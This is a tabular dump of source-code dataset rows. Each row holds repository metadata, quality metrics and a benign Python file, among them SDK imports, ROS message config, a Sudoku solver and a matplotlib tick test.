hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3374213c5a85817ad573e9d0c8eac937f90312d2 | 172 | py | Python | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | 1 | 2022-01-17T22:00:45.000Z | 2022-01-17T22:00:45.000Z | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | null | null | null | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | 1 | 2020-11-18T15:38:46.000Z | 2020-11-18T15:38:46.000Z | repos = [
"github.com/cf-platform-eng/mesos-boshrelease",
"github.com/cf-platform-eng/eureka-registrar-decorator",
"github.com/cf-platform-eng/demo-hdfs-app"
]
| 28.666667 | 60 | 0.709302 | 24 | 172 | 5.083333 | 0.583333 | 0.221311 | 0.270492 | 0.467213 | 0.540984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110465 | 172 | 5 | 61 | 34.4 | 0.797386 | 0 | 0 | 0 | 0 | 0 | 0.796512 | 0.796512 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
684b7b07492079cb42d4e40c935cebfd1f3f61ef | 2,978 | py | Python | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-gdpr-service."""
__version__ = "1.14.6"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
# data_deletion
from .wrappers import admin_cancel_user_account_deletion_request
from .wrappers import admin_cancel_user_account_deletion_request_async
from .wrappers import admin_get_list_deletion_data_request
from .wrappers import admin_get_list_deletion_data_request_async
from .wrappers import admin_get_user_account_deletion_request
from .wrappers import admin_get_user_account_deletion_request_async
from .wrappers import admin_submit_user_account_deletion_request
from .wrappers import admin_submit_user_account_deletion_request_async
from .wrappers import public_cancel_user_account_deletion_request
from .wrappers import public_cancel_user_account_deletion_request_async
from .wrappers import public_get_user_account_deletion_status
from .wrappers import public_get_user_account_deletion_status_async
from .wrappers import public_submit_user_account_deletion_request
from .wrappers import public_submit_user_account_deletion_request_async
# data_retrieval
from .wrappers import admin_cancel_user_personal_data_request
from .wrappers import admin_cancel_user_personal_data_request_async
from .wrappers import admin_generate_personal_data_url
from .wrappers import admin_generate_personal_data_url_async
from .wrappers import admin_get_list_personal_data_request
from .wrappers import admin_get_list_personal_data_request_async
from .wrappers import admin_get_user_personal_data_requests
from .wrappers import admin_get_user_personal_data_requests_async
from .wrappers import admin_request_data_retrieval
from .wrappers import admin_request_data_retrieval_async
from .wrappers import delete_admin_email_configuration
from .wrappers import delete_admin_email_configuration_async
from .wrappers import get_admin_email_configuration
from .wrappers import get_admin_email_configuration_async
from .wrappers import public_cancel_user_personal_data_request
from .wrappers import public_cancel_user_personal_data_request_async
from .wrappers import public_generate_personal_data_url
from .wrappers import public_generate_personal_data_url_async
from .wrappers import public_get_user_personal_data_requests
from .wrappers import public_get_user_personal_data_requests_async
from .wrappers import public_request_data_retrieval
from .wrappers import public_request_data_retrieval_async
from .wrappers import save_admin_email_configuration
from .wrappers import save_admin_email_configuration_async
from .wrappers import update_admin_email_configuration
from .wrappers import update_admin_email_configuration_async
| 49.633333 | 83 | 0.893553 | 420 | 2,978 | 5.828571 | 0.192857 | 0.196078 | 0.294118 | 0.169118 | 0.855392 | 0.85335 | 0.845997 | 0.629902 | 0.564542 | 0 | 0 | 0.002911 | 0.077233 | 2,978 | 59 | 84 | 50.474576 | 0.887918 | 0.13096 | 0 | 0 | 1 | 0 | 0.012432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.930233 | 0 | 0.930233 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
68625ade09261a45c66a1a3cbc2f1b0dca686314 | 1,845 | py | Python | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/LandmarkEntry.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/LandmarkList.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/StatusCode.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/StatusResponse.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapList.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapEntry.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapTexture.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SensorTopics.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/TrajectoryOptions.msg"
services_str = "/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/SubmapQuery.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/FinishTrajectory.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/StartTrajectory.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/WriteState.srv"
pkg_name = "cartographer_ros_msgs"
dependencies_str = "geometry_msgs;std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "cartographer_ros_msgs;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 153.75 | 848 | 0.852575 | 262 | 1,845 | 5.744275 | 0.240458 | 0.299003 | 0.201993 | 0.213953 | 0.641196 | 0.61196 | 0.61196 | 0.61196 | 0.61196 | 0.61196 | 0 | 0.015461 | 0.018428 | 1,845 | 11 | 849 | 167.727273 | 0.815572 | 0.026558 | 0 | 0 | 1 | 0.333333 | 0.886845 | 0.876254 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
689d6d12af5eaaa85a0a43cf76278ad3058d25ea | 183 | py | Python | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 3 | 2019-11-22T04:38:06.000Z | 2022-01-19T08:27:18.000Z | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 28 | 2018-02-01T20:39:42.000Z | 2018-04-26T17:25:23.000Z | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 1 | 2018-03-11T06:47:26.000Z | 2018-03-11T06:47:26.000Z | from base_sub_rig_template import SubRigTemplate
class QuadrupedLeg(SubRigTemplate):
BUILT_IN_META_DATA = SubRigTemplate.BUILT_IN_META_DATA.merge({'name': 'quadleg'}, new=True)
| 30.5 | 95 | 0.814208 | 24 | 183 | 5.833333 | 0.75 | 0.271429 | 0.3 | 0.357143 | 0.414286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092896 | 183 | 5 | 96 | 36.6 | 0.843373 | 0 | 0 | 0 | 0 | 0 | 0.060109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d7f043c071fa13ed9994ff58eec72751992ef91e | 7,972 | py | Python | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 60 | 2020-10-04T13:19:26.000Z | 2022-01-23T09:09:27.000Z | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 202 | 2020-10-04T13:03:46.000Z | 2021-07-29T07:39:15.000Z | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 169 | 2020-10-04T13:21:09.000Z | 2022-03-20T16:59:35.000Z | # Title: Sudoku Solver
# Link: https://leetcode.com/problems/sudoku-solver/
board = [["5","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]]
import collections
class Solution:
def solveSudoku(self, board: list(list())) -> None:
"""
Do not return anything, modify board in-place instead.
"""
def is_valid(r, c, n):
if n in self.rows[r] or n in self.columns[c] or n in self.sub_boxes[(r//3,c//3)]:
return False
return True
def place_num(r, c, n):
self.rows[r].add(n)
self.columns[c].add(n)
self.sub_boxes[(r//3,c//3)].add(n)
board[r][c] = n
def remove_num(r, c, n):
self.rows[r].remove(n)
self.columns[c].remove(n)
self.sub_boxes[(r//3,c//3)].remove(n)
board[r][c] = "."
def backtrack(emp_key, emp_indice):
row = emp_key
col = self.emp[emp_key][emp_indice]
# based on the dict self.emp key value and the indice value, we retrieve the column value.
resolved = False
for num in range(1, 10):
# iterate through numbers 1-9 at the current cell.
if is_valid(row, col, str(num)):
# examining if the num meets the rules
place_num(row, col, str(num))
# fill the cell in the 2-D array and update the tracking dicts
if row + 1 == 9 and emp_indice + 1 == len(self.emp[emp_key]):
# we reach the bottom row and the last column elememt in the list, i.e. we find a solution!
resolved = True
return resolved
elif emp_indice + 1 < len(self.emp[emp_key]):
# we move on to the next column in the same row
resolved = backtrack(emp_key, emp_indice+1)
elif emp_indice + 1 == len(self.emp[emp_key]):
# we move on to the next row with the first empty cell
resolved = backtrack(emp_key+1, 0)
if not resolved:
# backtrack, i.e. remove the num from the 2-D array and from the tracking dicts
remove_num(row, col, str(num))
else:
break
return resolved
self.rows = collections.defaultdict(set)
# using dict self.rows to track the digits in each row
self.columns = collections.defaultdict(set)
# using dict self.columns to track the digits in each column
self.sub_boxes = collections.defaultdict(set)
# using dict self.sub_boxes to track the digits in each 3x3 sub-box
self.emp = collections.defaultdict(list)
# using dict self.emp to track the empty cells in the 2-D array
# Note that for dict self.emp, the key is the 2-D array row number, and the value is the 2-D array column numbers.
# E.g., 0:[2, 3, 5, 6, 7, 8] --> row number is 0, column numbers are 2, 3, 5, 6, 7, and 8
for i in range(9):
for j in range(9):
if board[i][j] != ".":
self.rows[i].add(board[i][j])
self.columns[j].add(board[i][j])
self.sub_boxes[(i//3,j//3)].add(board[i][j])
else:
self.emp[i].append(j)
# we work on dict self.emp, pass in the first row number 0, and the first indice value of the dict value list
# which includes the column number values.
backtrack(0, 0)
solution = Solution()
solution.solveSudoku(board)
board = [["5","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]]
import collections
class Solution:
def solveSudoku(self, board: list(list())) -> None:
"""
Do not return anything, modify board in-place instead.
"""
def is_valid(r, c, n):
if n in self.rows[r] or n in self.columns[c] or n in self.sub_boxes[(r//3,c//3)]:
return False
return True
def place_num(r, c, n):
self.rows[r].add(n)
self.columns[c].add(n)
self.sub_boxes[(r//3,c//3)].add(n)
board[r][c] = n
def remove_num(r, c, n):
self.rows[r].remove(n)
self.columns[c].remove(n)
self.sub_boxes[(r//3,c//3)].remove(n)
board[r][c] = "."
def backtrack(emp_key, emp_indice):
row = emp_key
col = self.emp[emp_key][emp_indice]
# based on the dict self.emp key value and the indice value, we retrieve the column value.
resolved = False
for num in range(1, 10):
# iterate through numbers 1-9 at the current cell.
if is_valid(row, col, str(num)):
# examining if the num meets the rules
place_num(row, col, str(num))
# fill the cell in the 2-D array and update the tracking dicts
if row + 1 == 9 and emp_indice + 1 == len(self.emp[emp_key]):
# we reach the bottom row and the last column elememt in the list, i.e. we find a solution!
resolved = True
return resolved
elif emp_indice + 1 < len(self.emp[emp_key]):
# we move on to the next column in the same row
resolved = backtrack(emp_key, emp_indice+1)
elif emp_indice + 1 == len(self.emp[emp_key]):
# we move on to the next row with the first empty cell
resolved = backtrack(emp_key+1, 0)
if not resolved:
# backtrack, i.e. remove the num from the 2-D array and from the tracking dicts
remove_num(row, col, str(num))
else:
break
return resolved
self.rows = collections.defaultdict(set)
# using dict self.rows to track the digits in each row
self.columns = collections.defaultdict(set)
# using dict self.columns to track the digits in each column
self.sub_boxes = collections.defaultdict(set)
# using dict self.sub_boxes to track the digits in each 3x3 sub-box
self.emp = collections.defaultdict(list)
# using dict self.emp to track the empty cells in the 2-D array
# Note that for dict self.emp, the key is the 2-D array row number, and the value is the 2-D array column numbers.
# E.g., 0:[2, 3, 5, 6, 7, 8] --> row number is 0, column numbers are 2, 3, 5, 6, 7, and 8
for i in range(9):
for j in range(9):
if board[i][j] != ".":
self.rows[i].add(board[i][j])
self.columns[j].add(board[i][j])
self.sub_boxes[(i//3,j//3)].add(board[i][j])
else:
self.emp[i].append(j)
# we work on dict self.emp, pass in the first row number 0, and the first indice value of the dict value list
# which includes the column number values.
backtrack(0, 0)
solution = Solution()
solution.solveSudoku(board)
for x in board:
print(x)
| 44.786517 | 122 | 0.489212 | 1,102 | 7,972 | 3.491833 | 0.118875 | 0.036383 | 0.037422 | 0.025988 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0 | 0.029395 | 0.342825 | 7,972 | 177 | 123 | 45.039548 | 0.705096 | 0.297291 | 0 | 0.983607 | 0 | 0 | 0.030062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.016393 | 0 | 0.180328 | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0bd052231e9b88dda60685de6ef458c3a82d2ab7 | 115 | py | Python | src/yews/transforms/__init__.py | Lchuang/yews | 254c1d3887b812a94421bd6ccef4a51a7ef330e0 | [
"Apache-2.0"
] | 6 | 2019-04-15T17:41:34.000Z | 2019-08-18T13:17:23.000Z | src/yews/transforms/__init__.py | Luojiahong/yews | a3653f9d29cbeb257bdc28019ab7fbba365dec94 | [
"Apache-2.0"
] | 11 | 2020-04-19T12:28:56.000Z | 2021-05-13T16:43:03.000Z | src/yews/transforms/__init__.py | ChujieChen/yews | a80881597a45375353f80b696670b27cdfec5db2 | [
"Apache-2.0"
] | 9 | 2019-04-28T04:28:16.000Z | 2020-04-17T18:29:07.000Z | from .base import BaseTransform
from .base import Compose
from .base import is_transform
from .transforms import *
| 23 | 31 | 0.817391 | 16 | 115 | 5.8125 | 0.5 | 0.258065 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13913 | 115 | 4 | 32 | 28.75 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9be74f9a0a1be31d7d2df3d98782ab7d28d871e2 | 150 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | from pyradioconfig.parts.lynx.phys.PHY_internal_base import Phy_Internal_Base_Lynx
class phy_internal_base_leopard(Phy_Internal_Base_Lynx):
pass | 30 | 82 | 0.873333 | 23 | 150 | 5.217391 | 0.521739 | 0.366667 | 0.5 | 0.316667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 150 | 5 | 83 | 30 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 9 |
9bfbfcc0d76e8ee209630a729747fcaef727484b | 3,355 | py | Python | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | 1 | 2021-05-25T20:47:41.000Z | 2021-05-25T20:47:41.000Z | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | null | null | null | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
from helpers import assert_equality
def plot():
from matplotlib import pyplot as plt
x = [1, 2, 3, 4]
y = [1, 4, 9, 6]
fig = plt.figure()
ax = plt.subplot(4, 4, 1)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 2)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 3)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 4)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 5)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 6)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 7)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 8)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 9)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 10)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 11)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 12)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 13)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 14)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 15)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 16)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="on", right="on")
return fig
def test():
assert_equality(plot, __file__[:-3] + "_reference.tex")
return
